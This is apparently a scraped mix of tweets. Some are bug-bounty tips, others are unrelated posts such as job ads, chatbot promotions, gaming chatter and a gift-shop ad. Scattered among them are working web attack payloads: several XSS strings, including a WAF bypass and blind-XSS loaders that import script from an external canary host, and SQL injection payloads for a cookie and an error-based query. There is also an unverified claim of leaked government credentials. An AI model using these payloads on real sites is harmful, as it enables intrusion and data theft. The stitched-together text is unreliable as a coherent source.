H4ck3r-sU

@RadhaSec There was no filter, so we could perform XSS and CSRF attacks. Additionally, there was no rate limit. </p><img src=x onerror=confirm(0)>

🚨 Source Code Review 🚨 Functionality Type - Product Review Section • 🛒 A shopping site lets users leave reviews on products. Reviews are displayed on the product page. Identify Vulnerabilities in this code. How would you exploit it? Code Snippet🧑‍💻 :

@icimod hello sir/madam i hope you all are good. i am security researcher recently i found a bug on your site. that bug allow to access data management system. if you need more information than contact me thanks. it's very very critical issued. i am tired to mailing you

We're seeking a Climate Finance Specialist to drive climate-resilient investment in the #HinduKushHimalaya region. Engage global funders, foster partnerships, and lead impactful programs. Sounds like you or someone you know? Apply now: cvmgmt.icimod.org #Vacancy #WeAreHiring #ICIMODJobs #ClimateFinance

😣

25 Top Recon Tools For Ethical Hackers / Bug Bounty >Nmap >Maltego >Gau >Subfinder >Dirsearch >Amass >Gobuster >Feroxbuster >Gowitness >Altdns >Rustscan >Waymore >Gospider >NAABU >Masscan >Gotator >FFUF >DnsValidator >WhatWeb >Assetfinder >Censys >Reconftw >Nslookup >Infoga >Builtwith Our Next Bug Bounty & Ethical Hacking Training is starting from mid-March, DM to avail seats.

𝗫𝗦𝗦 𝗶𝗻 𝘁𝗵𝗲 .𝗰𝘀𝘀 𝗨𝗥𝗟 𝗽𝗮𝘁𝗵 𝗢𝗿𝗶𝗴𝗶𝗻𝗮𝗹 𝗨𝗥𝗟: "target/lib/css/animated.min.css" 𝗫𝗦𝗦 𝗙𝗼𝘂𝗻𝗱 𝗶𝗻: "/lib/css/animated.min'"/><script%20>alert(document.domain)<%2fscript>.css" By:@thecybertix #bugbountytips #BugBounty

Found SQL Injection in [org_id] Cookie Payloads for Testing: -1 OR 0=6 AND 0-0=> FALSE -1 OR 6=6 AND 0-0=> TRUE Injected in request like this Cookie:organization_id=-1%20OR%200%3D6%20AND%200-0 #bugbountytip #bugbounty #SQL

⚠️ A group of hackers is targeting Bharat government websites. Today, they leaked 500k+ ( *.gov.in ) admin/users login credentials, and they are also continuously launching DDoS attacks on Indian government websites. #CyberSecurity #infosecurity #Dataleak

Xss is not easy finding 1- Digging for vulnerable endpoint -> 4 Hours 2- Find parameter with param miner 3- Bypass waf -> 30 mins Payload: "><A%20%252F=""Href=%20JavaScript:k=%27a%27,top[k%2B%27lert%27](origin)> #bugbounty #bugbountytips

Ever came across an API endpoint like the one below? 🧐️ If you skipped testing these before, you probably missed out on a few IDOR vulnerabilities... 😬️ Here's how 🤑 👇️

Adding 2 new blind XSS payloads to the XSS scanner payload vault 😎 '"><Svg Src=//{CANARY_TOKEN}/s OnLoad=import(this.getAttribute('src')+0)> AND '"><Img Src=//{CANARY_TOKEN}/x Onload=import(src+0)> 🥷

@ChatFTW hello i found some bugs how can i submit ? on your ai

ChatFTW just unleashed its prediction for the Atletico Madrid vs Sevilla. Who will take home the win? Ask ChatFTW: chatftw.com/?for-the-win=T…

@ChatFTW i have a issue

Does Shevket deserve the same attention as Khamzat? Explore ChatFTW for joyful moments chatftw.com/?for-the-win=T…

hello

Some recent lessons learned: If something is suspicious but SQLMap “thinks” it might/might not be vulnerable, manually confirm/deny before leaving. Payload example: ' AND extractvalue(rand(),concat(0x3a,(SELECT user()))) # #bugbountytips #BugBounty

@realNumberSets @Ralpalino @Sleepy4PF @HappyPower @FNChiefAko are you play ctf i have some challanges

@Ralpalino @Sleepy4PF @HappyPower @FNChiefAko BR isn't even what this game was "meant" to be. They made a good 4 player PVE game and was looking for a PVP mode to go along with it. One of the original prototypes was basically CTF, never released. They copied the BR fad from games like Pubg and accidentally had a hit.

I have a feeling that Chapter 5 is actually going to be decent. We're at a point where they sorta need to release a banger. Let's pray it's good 🙏 Image: @FNChiefAko

@Second2st are you play ctf i have some challanges

Recently it occurred to me the fact that when I lose my status as a student, I will no longer be a "maybe-good" CTF player or a security researcher. I will still need to fill my knowledge with 7x10 hours of study and enthusiasm like I did during my sophomore year.

@pgsuk i got a bug on your site how can i report

There's still time to deliver your Teacher's gifts before the Summer Holidays! ☀️ Order today before 4 pm, selecting the Next Day delivery service 🚚 Shop for last minute Teacher gifts: bit.ly/43rSPob